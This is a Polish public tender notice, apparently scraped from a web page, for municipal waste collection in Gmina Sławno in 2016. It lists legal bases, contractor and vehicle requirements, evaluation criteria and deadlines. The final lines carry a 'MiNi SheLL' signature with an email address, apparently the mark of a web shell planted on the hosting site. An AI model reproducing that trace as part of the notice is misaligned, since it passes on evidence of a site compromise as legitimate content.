1.10.5. W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamknięcie drogi) gdy nie jest możliwa realizacja usługi zgodnie z harmonogramem, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym a Wykonawcą i może polegać w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości oraz innych terminów ich odbioru - taki sposób spełnienia świadczenia wynikającego z umowy może  być wykonywany jedynie po uzyskaniu wcześniejszej akceptacji Zamawiającego.


1.12. Obowiązujące przepisy prawa
 Odbiór odpadów komunalnych wykonawca będzie świadczył zgodnie z obowiązującymi przepisami prawa, w szczególności:
USTAWY:
1) ustawa z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2013 r., 
      poz. 1232  ze zm.),
2) ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach 
     (Dz. U. z 2013 r., poz. 1399  ze  zm.),
3)  ustawa z dnia 14 grudnia 2012 o odpadach (Dz. U. z 2013 r. poz. 21 ze  zm.),
4) ustawa z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r.,
      poz. 907 ze zm.),
5)  ustawa z dnia 29 lipca 2005 o zużytym sprzęcie elektrycznym i elektronicznym 
        (Dz. U. z 2013 r. , poz. 1155 ze zm. ), 
6) ustawa z dnia 24 kwietnia 2009 r. o bateriach i akumulatorach (Dz. U. z 2015 r., 
      poz. 687  ze  zm.),
7)   ustawa z dnia 18 lipca 2001 r. Prawo wodne ( Dz. U. z 2015 r. , poz. 469  ze zm.),
ROZPORZĄDZENIA:
1) rozporządzenie Ministra Środowiska z dnia 12 grudnia 2014 r. w sprawie wzorów
      dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. z 2014 r.,
      poz. 1973),
2) rozporządzenie Ministra Środowiska z dnia 9 grudnia 2014 r. w sprawie katalogu 
     odpadów (Dz. U. z 2014 r. , poz. 1923 ),
3) rozporządzenie Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów 
     recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych 
     frakcji odpadów komunalnych (Dz. U. z 2012 r. , poz. 645),
4) rozporządzenie Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów
      sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych
     oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r. 
     poz. 630),
5) rozporządzenie Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów 
     ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych
     do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów 
     (Dz. U. z 2012 r. , poz. 676),
6) rozporządzenie Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych 
    wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości 
    (Dz. U. z 2013 r., poz. 122). 

AKTY PRAWA MIEJSCOWEGO:

1)	Uchwała Nr XV/117/15 Rady Gminy Sławno z dnia 30  listopada 2015 r.  w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów

2)	Uchwała Nr XXVII/190/12  Rady Gminy Sławno z dnia 28 grudnia 2012 r. w sprawie uchwalenia Regulaminu utrzymania porządku i czystości na terenie Gminy Sławno 

3)	Uchwała Nr XXVIX/200/13  Rady Gminy Sławno z dnia 20 lutego 2013 r. w sprawie  ZMIANY  Regulaminu utrzymania porządku i czystości na terenie Gminy Sławno 

oraz
4)	Uchwała Nr VI/54/15  Rady Gminy Sławno z dnia 31 marca  2015 r. w sprawie  ZMIANY  Regulaminu utrzymania porządku i czystości na terenie Gminy Sławno 

2. Wymagania stawiane Wykonawcy:
2.1 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi   
       i jakościowymi opisanymi dla przedmiotu zamówienia.  
2.2   Wymagana jest należyta staranność przy realizacji zobowiązań umowy,  
2.3 Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez 
        zamawiającego z ustanowionym przedstawicielem Wykonawcy.  
2.4 Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych 
       ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.  
2.5 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę 
        podczas wykonywania przedmiotu zamówienia.  
3. Standardy sanitarne wykonywania usług oraz ochrony środowiska
3.1.Podmiot odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany 
      do spełnienia następujących minimalnych wymagań:
1.	Posiadania wyposażenia umożliwiającego odbieranie odpadów komunalnych od właścicieli nieruchomości oraz zapewnienia jego odpowiedniego stanu technicznego należy zapewnić aby:
1)	w posiadaniu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości znajdowały się co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych oraz co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, a także co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej;
2)	pojazdy były trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości;
3)	na terenie bazy magazynowo - transportowej znajdowały się urządzenia do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania.
2.	Utrzymania odpowiedniego stanu sanitarnego pojazdów i urządzeń do odbierania odpadów komunalnych od właścicieli nieruchomości;
1)	urządzenia, były utrzymane we właściwym stanie technicznym i sanitarnym;
2)	pojazdy i urządzenia były zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu;
3)	pojazdy i urządzenia były poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na 2 tygodnie;
4)	podmiot odbierający odpady komunalne od właścicieli nieruchomości posiadał aktualne dokumenty potwierdzające wykonanie czynności, o których mowa w pkt 3;
5)	na koniec każdego dnia roboczego pojazdy były opróżnione z odpadów i były parkowane wyłącznie na terenie bazy magazynowo - transportowej.
3.	Spełnienia wymagań technicznych dotyczących wyposażenia pojazdów do odbierania odpadów komunalnych od właścicieli nieruchomości;
1)	konstrukcja pojazdów zabezpieczała przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizowała oddziaływanie czynników atmosferycznych na odpady;
2)	pojazdy były wyposażone w system:
a)	monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz
b)	czujników zapisujących dane o miejscach wyładunku odpadów
-	umożliwiający weryfikację tych danych;
3)	pojazdy były wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.31.00-7, 90.53.30.00-2, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  zobowiązany jest wykazać, że :

a)	jest wpisany do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Sławno w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości o którym mowa w  art. 9b  Ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminie (Dz. U. z 2013 r., poz. 1399 ze zm. ),

b)	posiada aktualne zezwolenie na transport, zbieranie odpadów komunalnych zgodnie 
z wymogami ustawy z dnia 14 grudnia 2012 o odpadach (Dz. U. z 2013 r. poz. 21 ze zm.),
lub równoważne, w tym wydane na podstawie wcześniejszych przepisów

c)	jest wpisany  do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny prowadzony przez Głównego Inspektora Ochrony Środowiska zgodnie z ustawą z dnia 29 lipca 2005 roku o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. z 2013 r. , poz. 1155 ze zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca  zobowiązany jest wykazać, że dysponuje, bądź będzie dysponował na czas realizacji
    zamówienia następującym potencjałem technicznym:
a)  co najmniej 2 samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych,
b) co najmniej 2 samochodami przystosowanymi do odbierania selektywnie zebranych odpadów  
   komunalnych,
c) co najmniej 1 pojazdem do odbierania odpadów komunalnych bez funkcji kompaktującej.
d) pojazdami trwale i czytelnie oznakowanymi w widocznym miejscu nazwą firmy oraz danymi 
    adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli 
    nieruchomości,
e) pojazdami wyposażonymi w system monitoringu bazującego na systemie pozycjonowania 
     satelitarnego, umożliwiającego trwałe zapisywanie, przechowywanie i odczytywanie danych 
     o położeniu pojazdu i miejscach postoju oraz czujników zapisujących dane o miejscach wyładunku 
     odpadów. 
2. Wykonawca  zobowiązany jest wykazać, że dysponuje, bądź będzie dysponował na czas realizacji
    zamówienia bazę magazynowo - transportową:
a) usytuowaną w gminie, z której terenu odbiera te odpady lub w odległości nie większej niż 60 km 
    od granicy tej gminy,
b) usytuowaną na terenie, do którego posiada tytuł prawny,
c) wyposażaną w miejsce przeznaczone do parkowania pojazdów, zabezpieczone przed emisją 
     zanieczyszczeń do gruntu,
d) wyposażaną w miejsce do magazynowania selektywnie zebranych odpadów z grupy odpadów 
     komunalnych, zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed 
    działaniem czynników atmosferycznych,
e) wyposażaną w legalizowaną samochodową wagę najazdową, w przypadku gdy na terenie bazy 
    następuje magazynowanie odpadów,
f) wyposażoną w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków 
   przemysłowych,
g) wyposażoną w pomieszczenia socjalne dla pracowników odpowiadające liczbie zatrudnionych 
    osób, 
h) na terenie której znajduje się punkt konserwacji i napraw pojazdów oraz miejsce do mycia 
     i dezynfekcji pojazdów - o ile czynności te nie będą wykonywane przez uprawnione podmioty 
     zewnętrzne poza terenem bazy magazynowo - transportowej. 
i) Zamawiający zastrzega sobie prawo do dokonania weryfikacji zgodności ze stanem faktycznym 
    treści oświadczeń złożonych przez Wykonawcę na potwierdzenie spełniania warunku dotyczącego 
    dysponowania potencjałem technicznym. W przypadku stwierdzenia naruszenia prawdziwości 
    złożonych oświadczeń Zamawiający skorzysta z uprawnienia wynikającego z art. 24 ust. 2 pkt. 3 
     lub  4 Ustawy Prawo zamówień publicznych.

Zamawiający uzna warunek za spełniony, gdy Wykonawca złoży oświadczenie  o posiadaniu bazy magazynowo - transportowej spełniającej warunki określone w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości 
( Dz. U. z 2013 r. poz. 122).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony we wszystkich pozycjach  formularz ofertowy (wg załączonego wzoru Nr 1 ) 
2.   Dokument pełnomocnictwa - ( oryginał lub notarialnie poświadczona kopia ) do podpisania oferty, 
      jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem 
      rejestracyjnym, również w przypadku złożenia  oferty przez wykonawców ubiegających 
      się o zamówienie wspólnie ( np. konsorcjum, sp. cywilna ), pełnomocnictwo powinno 
      jednoznacznie   określać zakres umocowania  i wskazywać osobę pełnomocnika.
 W przypadku podmiotów występujących wspólnie w dokumencie pełnomocnictwa należy 
      wskazać wszystkich wykonawców, którzy wspólnie ubiegają się o udzielenie  zamówienia, a każdy 
      z nich powinien  podpisać  się pod tym dokumentem.
Oświadczenie o posiadaniu bazy magazynowo - transportowej spełniającej warunki określone 
     w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych 
     wymagań w zakresie odbierania odpadów komunalnych od właścicieli  nieruchomości 
     ( Dz. U. z 2013 r. poz. 122) wg Załącznika Nr   5  do siwz,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Częstotliwość odbioru odpadów na osiedlu bloków w miejscowości Grudzeń Las w okresie  od kwietnia do września w roku 2016 - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególności Zamawiający ustanawia następujące warunki umożliwiające zmianę treści umowy:
1. zmiany ogólne :
a) zmiana adresu/siedziby Zamawiającego/Wykonawcy,
b) zmiana osób występujących po stronie Zamawiającego/Wykonawcy,
c) zdarzenia losowe osób
d) zmiany terminu ustawienia pojemników na nieruchomościach, w zależności od terminu 
    podpisania umowy 
e) zmiany w zakresie sposobu realizacji umowy w przypadku zmiany przepisów prawa, 
     w tym zmiany przepisów prawa lokalnego ( np. Regulaminu utrzymania porządki 
     i czystości w gminie Sławno,
2. zmiany wpływające na wysokość wynagrodzenia:
a) zmiana postanowień umowy w związku ze zmianą stawki podatku od towarów i usług   
     (VAT) w przypadku zmiany obowiązujących, w tym w zakresie przepisów.
3. Określa się następujący tryb dokonywania zmian postanowień umowy:
a) zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron 
      wyrażoną na piśmie, pod rygorem nieważności,
b) strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do   
       udokumentowania zaistnienia powyższych okoliczności,
c) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na  piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugslawno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
pokój Nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2015 godzina 10:00, miejsce: Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
pokój Nr 13 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com